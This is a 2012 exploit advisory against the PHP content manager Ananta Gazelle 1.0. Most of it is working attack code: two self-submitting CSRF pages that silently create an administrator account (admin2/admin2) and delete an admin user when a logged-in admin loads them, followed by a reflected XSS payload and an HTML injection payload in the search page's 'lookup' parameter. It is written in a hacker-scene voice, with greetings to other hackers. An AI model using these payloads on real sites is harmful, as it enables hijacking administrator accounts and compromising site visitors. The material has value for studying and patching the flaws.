<===============================================================================>
[»] Ananta_Gazelle1.0.zip <= Multiple Exploits = CSRF/Xss/Html code injection
<===============================================================================>
[»] ---> Date : 29- 03- 2012
[»] ---> Author : Expl0!Ts
[»] ---> Software Link : http://garr.dl.sourceforge.net/project/ananta/stable/Gazelle%201.0%20stable/Ananta_Gazelle1.0.zip
[»] ---> Version:
[»] ---> Category: php
[»] ---> Tested on: wind xp & ubuntu 10.10
[»] ---> Dork : your mind
<=======================================================>
1- First Vuln its CSRF :
-------------------------------------------------------------------------------< 1
!=> add admin
!=> vuln p0c :
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title> Ananta_Gazelle1.0 add admin by : Expl0!Ts </title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "64","51" );
function pausecomp(millis)
{
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < millis);
}
function fireForms()
{
var count = 2;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
pausecomp(pauses[i]);
}
}
</script>
<H1>Ananta_Gazelle1.0 add admin by : Expl0!Ts</H1>
<form method="GET" name="form0" action="http://127.0.0.1:80/ga/admin/index.php?Users/Add User">
<input type="hidden" name="name" value="value"/>
</form>
<form method="POST" name="form1" action="http://127.0.0.1:80/ga/admin/index.php?Users/Add User">
<input type="hidden" name="name" value="admin2"/>
<input type="hidden" name="pass" value="admin2"/>
<input type="hidden" name="controle" value="admin2"/>
<input type="hidden" name="email" value="admin2@dz4all.com"/>
<input type="hidden" name="active" value="on"/>
<input type="hidden" name="admin[]" value="2"/>
<input type="hidden" name="save" value="Add"/>
<input type="hidden" name="table" value="users"/>
<input type="hidden" name="joindate" value="2012-03-29 12:07:20"/>
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------< 2
!=> Delete admin
!=> vuln p0c :
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title> Ananta_Gazelle1.0 Delete admin by : Expl0!Ts </title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "58" );
function pausecomp(millis)
{
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < millis);
}
function fireForms()
{
var count = 1;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
pausecomp(pauses[i]);
}
}
</script>
<H1>Ananta_Gazelle1.0 Delete admin by : Expl0!Ts</H1>
<form method="POST" name="form0" action="http://127.0.0.1:80/ga/admin/index.php?Users/Delete User">
<input type="hidden" name="number" value="2"/>
<input type="hidden" name="save" value="Delete"/>
<input type="hidden" name="table" value="users"/>
</form>
</body>
</html>
-----------------------------------------------------------------------------------------------------------------
2- secnd vuln its Xss :
http://127.0.0.1/ga/search.php?lookup=<script>alert("khaled-Ham-iTs-here n0w ")</script>
----------------------------------------------------------------------------------------------------------------
3- therd vuln its Html Code Injection :
http://127.0.0.1/ga/search.php?lookup=<h1>Hi in My vuln enJoY ...</h1>
================================================================>
==> greatz : Damane2011 & BaC & black-id & robert m °0°...°0°
==> Thnks y0u : baset and merouane and abdllah my best freind
================================================================>
EnJoY o_O